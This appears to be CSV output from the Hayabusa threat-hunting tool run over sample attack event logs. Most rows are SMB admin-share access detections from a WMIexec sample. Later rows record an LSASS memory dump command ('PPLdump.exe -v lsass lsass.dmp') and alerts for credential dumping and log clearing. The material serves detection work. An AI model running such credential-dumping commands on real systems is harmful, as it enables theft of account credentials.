10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio49d6fefe#\504088f50d79f510c3d363ad5a4c58cc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio53a7a42c#\7b19e9c40f25ea7b5ca13312053ab849 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.224 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.240 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio080b339b#\d47241c3aea71d38b02fd1cd03c55474 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.256 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.257 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a7b877#\2837fdc670a5c72d64db85e2af347449 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatio84a6349c#\7fac8b827be2ffa333eda4ee3560d8f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.282 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatioaec034ca#\155b3e5bd15d88ce27d096bd7c40bd33 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.298 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded# : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiob3047ded#\991f02d895032e2eca7f6baebab96ddc : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\Presentatiod51afaa5#\ee4933bf7dcf5304cb565e4f2b833b24 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationCore\71df43fcb7a7745ef38a6ce40ff33c2d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\PresentationUI\16135860bdfd502ca9212ab087e9dd26 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\ReachFramework\0dbd8b9aecffc6cde6bb8aab468084f4 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.313 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_64\SecurityAudf6921413#\085b01b1533aaba67cfade21b3bda1a5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Documents : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:32.329 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\desktop.ini : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:33.636 
+09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.108 +09:00,fs03vuln.offsec.lan,5145,high,SMB Create Remote File Admin Share,,rules/sigma/builtin/security/win_smb_file_creation_admin_shares.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management 
Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop\SMB exec.evtx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.109 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: 
admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63565 : LogonID: 0x18c318,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63566 : LogonID: 0x18c326,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: : IP Address: 10.23.23.9 : Port: 63567 : LogonID: 0x18c336,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5140,informational,Network Share Access,User: admmig : Share Name: \\*\IPC$ : Share Path: : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5140_NetworkShareAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.124 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File 
Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP\DESKTOP.INI : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.140 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.179 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: USERS\ADMMIG\DESKTOP : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.195 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig\Desktop : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows 
Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:36.211 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Users\admmig : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: PPLdump.exe -v lsass lsass.dmp : Path: C:\Users\IEUser\Desktop\PPLdump.exe : User: MSEDGEWIN10\IEUser : Parent Command: ""C:\Windows\system32\cmd.exe"" ",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:25.389 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,informational,Process Creation,"Command: C:\Windows\system32\services.exe 652 ""lsass.dmp"" a708b1d9-e27b-48bc-8ea7-c56d3a23f99 -v : Path: C:\Windows\System32\services.exe : User: NT AUTHORITY\SYSTEM : Parent Command: PPLdump.exe -v lsass lsass.dmp",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.081 +09:00,MSEDGEWIN10,1,high,LSASS Memory Dumping,,rules/sigma/process_creation/win_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Process Memory Dump Files,,rules/sigma/file_event/file_event_lsass_dump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,11,high,LSASS Memory Dump File Creation,,rules/sigma/file_event/sysmon_lsass_memory_dump_file_creation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,Credentials Dumping Tools Accessing LSASS Memory,,rules/sigma/process_access/sysmon_cred_dump_lsass_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:26.163 +09:00,MSEDGEWIN10,10,high,LSASS Memory Dump,,rules/sigma/process_access/sysmon_lsass_memdump.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.165 +09:00,MSEDGEWIN10,12,medium,CurrentVersion Autorun Keys Modification,,rules/sigma/registry_event/sysmon_asep_reg_keys_modification_currentversion.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: 
C:\Windows\system32\svchost.exe -k LocalService -p -s fdPHost : Path: C:\Windows\System32\svchost.exe : User: NT AUTHORITY\LOCAL SERVICE : Parent Command: ?,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,high,Suspicious Svchost Process,,rules/sigma/process_creation/win_susp_svchost.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-23 07:09:35.284 +09:00,MSEDGEWIN10,1,low,Windows Processes Suspicious Parent Directory,,rules/sigma/process_creation/win_proc_wrong_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/ppl_bypass_ppldump_knowdll_hijack_sysmon_security.evtx +2021-04-26 17:25:31.043 +09:00,srvdefender01.offsec.lan,1102,high,Security log was cleared,User: admmig,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4672,informational,Admin Logon,User: admmig : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4672_AdminLogon.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 17:25:36.560 +09:00,srvdefender01.offsec.lan,4624,informational,Logon Type 3 - Network,User: admmig : Workstation: - : IP Address: 10.23.123.11 : Port: 47020 : LogonID: 0x4da321f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/EVTX_full_APT_attack_steps/ID4688,5140,5145-WMIexec execution via SMB (GLOBAL).evtx" +2021-04-26 